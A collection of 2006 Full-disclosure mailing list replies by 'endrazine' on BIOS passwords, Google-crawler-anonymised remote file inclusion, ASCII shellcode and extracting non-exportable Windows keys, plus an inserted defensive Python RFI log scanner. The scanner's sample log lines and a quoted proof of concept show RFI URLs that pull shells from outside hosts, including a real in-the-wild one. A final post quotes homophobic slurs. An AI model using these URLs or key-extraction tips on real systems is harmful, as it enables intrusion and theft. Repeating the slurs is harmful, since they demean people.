BIOS passwords are stored in the CMOS, not the ROM itself, so no, it
doesn't have to be.
On the other side, if you can flash your ROM, you have iopl(3), hence
root privileges or
at least enough privileges to get those passwords back (1). So that's
really no big deal.

Regards,

endrazine-


(1) 
http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt


side note: I think you both know nothing. Sadly, giving non technical 
_opinions_ has become
the main source of postings on this list.



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread endrazine
endrazine wrote:
Just so you know : most Bios settings are stored on the Cmos,
so if you can flash the Rom, you have ioperms at the very least on Cmos 
i/o ports,
so you can reset the whole Cmos anyway.


endrazine-



Re: [Full-disclosure] Anonymizing RFI Attacks Through Google

2006-11-24 Thread endrazine
Hi Gadi,

I beg your pardon, but either I missed the purpose of this post, or you discovered hot water: this process of attack is a mere waste of time if one only reaches anonymity: in order to give Google this new url to crawl, you'd have to either create a web page that points to this very page, or enter the url in the Google database directly using their form. Neither of those two options is safer than attacking the website directly (Google might very well log your actions), so what's the point?

Also, most features in the web (like free emails, online scanning, pinging, lookup, etc., most applets allowing you to use irc, ftp or other services...) can be used to anonymise (or at least proxify) attacks. So why focus on Google and search engines specifically?

To be honest, my biggest issue with this post is its lack of technicality: no offense, but I can hardly see anything that isn't public knowledge in this post.

Regards,


endrazine-

Gadi Evron wrote:
 Noam Rathaus on using Google to anonymize attacks on websites:
 http://blogs.securiteam.com/index.php/archives/746

 Anonymizing RFI Attacks Through Google
 noam - November 23, 2006 on 12:03 pm

 Google can be utilized to hack into websites - actively exploiting them
 (not information gathering by the use of Google hacking, although that
 is how most of the sites vulnerable to RFI attacks are found).

 By placing a URL on any web page, Google will find it, visit it and then
 index it. With this mechanism, it is possible to anonymize attacks on
 third party web sites through Google by the use of its crawler.

 PoC -
 A malicious web page is constructed by an attacker, containing a URL built
 like so:
 1. Third party site URI to attack.
 2. File inclusion exploit.
 3. Second URI containing a malicious PHP shell.

 Example URL:
 http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

 Google will harvest this URL, visit the site using its crawler and index
 it.
 Meaning accessing the target site with the URL it was provided and
 exploiting it unwittingly for whoever planted it. It's a feature, not a
 bug.

 This is currently exploited in the wild. For example, try searching Google
 for:
 inurl:cmd.gif

 And note, as an example:
 www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
 Which is no longer vulnerable.

 Why use a botnet when one can abuse the Google crawler, which is allowed
 on most web sites?

 Notes:
 1. This attack was verified on Google, but there is no reason why it
 should not work with other search engines, web crawlers and web spiders.
 2. File inclusions seem to tie in well with this attack anonymizer, but
 there is no reason why others attack types can't be used in a similar
 fashion.
 3. The feature might also be used to anonymize communication, as a covert
 channel.

 Noam Rathaus.
 (with thanks to Gadi Evron and Lev Toger) 


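From the defender's side of the thread, as an added example that is not part of either post: a scan over web server access log lines that flags requests whose query string carries a remote URL (the file inclusion pattern in Noam's PoC) and records whether the request arrived with a crawler user agent, which is what a planted URL fetched by a search engine would look like in the victim's logs. The log regex, the crawler list and the sample lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access log line (constructed regex, enough for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)   # parameter that is itself a URL
CRAWLER_UA_RE = re.compile(r"googlebot|bingbot|slurp|baiduspider", re.I)  # constructed list

# Constructed sample lines: a planted include fetched by a crawler, one fetched by a
# browser using the split "http:/ /" trick seen in the thread, one benign request,
# and one using the bare "?http://..." form of the PoC URL.
SAMPLE_LOG = [
    '66.249.66.1 - - [24/Nov/2006:10:15:02 +0000] "GET /index.php?s=http://evil.example.net/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.7 - - [24/Nov/2006:10:16:40 +0000] "GET /index.php?s=http:/%20/evil.example.net/CMD.gif?cmd HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [24/Nov/2006:10:17:01 +0000] "GET /index.php?s=about HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [24/Nov/2006:10:18:13 +0000] "GET /vuln.php?http://evil.example.net/x.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


def find_rfi(line):
    """Return a hit dict when any query parameter (key or value) is a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["path"]).query
    # keep_blank_values: "?http://host/x" has no '=' and must still surface as a key
    for key, value in parse_qsl(query, keep_blank_values=True):
        for part in (key, value):
            # collapse whitespace so the "http:/ /" obfuscation still matches
            candidate = re.sub(r"\s+", "", part)
            if REMOTE_URL_RE.match(candidate):
                return {"ip": m["ip"], "include": candidate,
                        "via_crawler": bool(CRAWLER_UA_RE.search(m["ua"]))}
    return None


def scan_log(lines):
    """All RFI-looking requests in `lines`, in order."""
    return [hit for hit in map(find_rfi, lines) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A crawler-originated hit is not the attacker's own address, so the interesting field for follow-up is the included URL, not the source IP.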


Re: [Full-disclosure] *BSD banner INT overflow vulnerability

2006-11-22 Thread endrazine
Tyop? wrote:
 $ ls -l /usr/bin/banner
 -r-xr-xr-x  1 root  wheel  9576 Jul  5  2005 /usr/bin/banner
 $

 pfiuuu..
 I'm safe. Thx a lot.

 F34r da banner H4x0r.

   
Rofl: you summarized it all: there's a bug, not a security issue though.
Cheers,

endrazine-

PS : I suggest posting such bugs with '[XSS]' in the subject, to ease 
filtering ;)



Re: [Full-disclosure] How to covert shellcode to HTML style ?

2006-11-11 Thread endrazine
take 2: had some issues in sending this one

Hi list,


Knud Erik Højgaard wrote:
 On 11/9/06, 李继辉 [EMAIL PROTECTED] wrote:
 For example ,I find This exploit:

 http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your
 upcoming botnet.
Nod, encoding the shellcode into an acceptable charset is something that has been done for ages now (see Philippe Biondi's shellforge [1] - did you fix the final ret? ;) - for instance, or old phrack issues [2] [3]).

Let's focus a bit on x86:
What about the return address if you have a simple buffer overflow for instance? I just did a few tests, and you can't simply urlencode the return address assuming the webserver/client will decode it automatically for you (it won't). Since addresses in the stack are typically around 0xbf?? in memory, this return address _will_ contain non printable characters (at least the \bf one), even if the overflow is big enough so that you can get rid of the other ones by jumping at an appropriate address in the stack...

I have no simple solution atm, but forging valid arguments for the current syscall that will eventually do something evil in the process (which isn't something that can be done in a systematic way) and _not_ overwriting the return address.. You could think of crafting arguments for previous stack frames too, but since you still can't forge return addresses for those, you will not be able to overwrite both local and global variables pushed on the stack...

Another solution would be ret2esp [4], assuming you find:
1) a way to store your shellcode somewhere in memory, the address of your shellcode being a pure ASCII string.
2) an address in memory that will allow you to jmp %esp (or mov %esp, etc.), that address being usable as a return address (ie: is a pure ASCII string).

I doubt those conditions will ever be met..

Things should be quite similar on Sparc architectures imho since afaik, the return address isn't pushed on the stack, so the problem is very close to this one.

In a nutshell: Erik, I disagree with you, I think it's a valid, non trivial, question :)


Regards,

endrazine-

[1] http://www.secdev.org/projects/shellforge/ ---which isn't just ia32 between :)

[2] http://www.phrack.org/archives/57/p57-0x18

[3] http://www.phrack.org/archives/61/p61-0x0b_Building_IA32_UnicodeProof_Shellcodes.txt
 


[4] http://www.tty64.org/doc/expwlnxgateso1.txt





Re: [Full-disclosure] Putty Proxy login/password discolsure....

2006-10-25 Thread endrazine
cardoso wrote:
 Exactly. A few years ago I used to deal with linux fanboys showing them
 the cute trick of linux single at boot time. After a few hours begging
 for the admin password, I taught the trick and they usually stopped the
 brag about how secure Linux was.

You know we do appreciate your work with crackheads.
Local attacks against windows are easier imho though.


endrazine-



Re: [Full-disclosure] Putty Proxy login/password discolsure....

2006-10-25 Thread endrazine
Paul Schmehl wrote:
 Not even that is true.  You can always *access* the data.  Depending 
 upon the type and complexity of the encryption, it may take a while to 
 decrypt, but once I have physical access, I have both the data and the 
 time to do just that.  *Most* of the encryption schemes for things 
 like passwords that 
several times the age of the universe is a while though.
 used to be stored in plain text (until somebody pointed it out) are 
 fairly trivial and easily broken.

 Even if they're not, I may be able to use the program itself to 
 decrypt the password and then capture it in plain text in memory.

You know you can use pretty strong encryption on HD, right?
 Again, once you have physical access, it's game over, plain and simple.

 Paul Schmehl ([EMAIL PROTECTED])

Regards,

endrazine-



Re: [Full-disclosure] Fire and forget exploits?

2006-10-20 Thread endrazine

Hi,

Brendan Dolan-Gavitt wrote:
 Hi, I'm looking for examples of (remote) security vulnerabilities
 whose exploitation involves no guesswork--eg, no bruteforcing the
 return address, or altering your exploit based on the server's
 response, etc.
I guess you're thinking about _remote_ exploitation? You don't have to guess anything for a local bo for instance.. Anyway:
 It seems like this kind of exploit is dying out, particularly as
 different flavors of Linux proliferate, each with their own
 slightly
Target the kernel? Use linux-gate.so?
Portability of your exploit will greatly depend on how you choose to exploit the vulnerability, since it's quite common to have to choose between several exploitation scenarios..
 different libc and userland; in the Windows world, however, we
 still find universal exploits that work on NT4/2k/XP over a
 variety of service packs.
The language also affects some pointers. Anyway, if you need let's say a jmp esp, you can try to choose one location in memory that contains this opcode for several SP/languages. But I don't think you can prove any exploit will be universal... (can you? ;)
 Anyways, if anyone has come across things like this, I'd greatly
 appreciate hearing about it. I'm working on some new methods to
 deliver exploits at once while minimizing recon.

 Thanks, Brendan Dolan-Gavitt

Cheers,

endrazine-



Re: [Full-disclosure] cloning PC / run in VMware

2006-07-25 Thread endrazine
Nicolas RUFF wrote:
 Thanks for the input. But the problem is, that the private key of the
 certificate cannot be exported (not allowed by the certificate store of 
 windows) - so this doesn't work...
 

 Don't tell me a simple greyed out checkbox can stop you ...
   
^--- Foundstone's showwin.exe usually does the trick
http://www.foundstone.com/resources/proddesc/showin.htm

 http://2005.hack.lu/wiki/images/b/ba/Hacklu_catch_the_key.ppt

 Regards,
 - Nicolas RUFF


   
Cheers,

endrazine-



Re: [Full-disclosure] cloning PC / run in VMware

2006-07-25 Thread endrazine
[EMAIL PROTECTED] wrote:
 Hi there

 Thanx for information... Will try my best :)

 Have a nice day,
 GreetZ from IndianZ


   
 Don't tell me a simple greyed out checkbox can stop you ...
 
 ^--- Foundstone's showwin.exe usually does the trick
   
 Actually, it's a bit harder.

 At export time, the Crypto provider will check the non exportable
 flag, even if you have ungreyed the checkbox.

 From here you have 2 choices :

 - Searching for the private key blob in the process memory.

 - Patching the Crypto provider to kill the check (harder, because of WFP
 and some internal checksums inside Crypto providers - e.g. RSAENH.DLL).
 

if you're ready to do some reverse engineering, then editing the
resources of the app would be better than using showwin.
if they took the time to add checksums, the first solution you mentioned
will prolly be faster.
/my two cents

 I have not heard of any readily usable code on the Internet, but looking
 at the slides it should not be too hard to reproduce.

 Regards,
 - Nicolas RUFF


 


 GreetZ from IndianZ

 mailto:[EMAIL PROTECTED]
 http://www.indianz.ch


   



Re: [Full-disclosure] Google Malware Search

2006-07-17 Thread endrazine
H D Moore wrote:
 http://metasploit.com/research/misc/mwsearch/?q=bagle

 Enjoy,

 -HD


   
HD : I like the idea :)

 http://metasploit.com/research/misc/mwsearch/?q=.btnG=Malware+Search
(anyone has a better dork so far ?)

Cheers,

endrazine-



Re: [Full-disclosure] ALL_HAIL_THIS_IS_THE_GADI_EVRON_OF_THE_FAGGOT_FUTURE

2006-06-23 Thread endrazine

Hey you, fucker filling my mailbox:

if you were a hacker you'd have better things to do (we're all lacking 
time here)

Now let us work and go back to WoW

endra-

Future Gadi Evron wrote:


Gadi Evron is a known leader in the world of Internet security operations,
and especially in the realm of future faggot hacking and golden showers.
He was previously the Israeli Government Internet Faggotry Operations
Manager, as well as the Israeli Government TWINK Manager. Today, he
manages the SecuriTeam portal and works for Israeli-based Beyond Security.


 


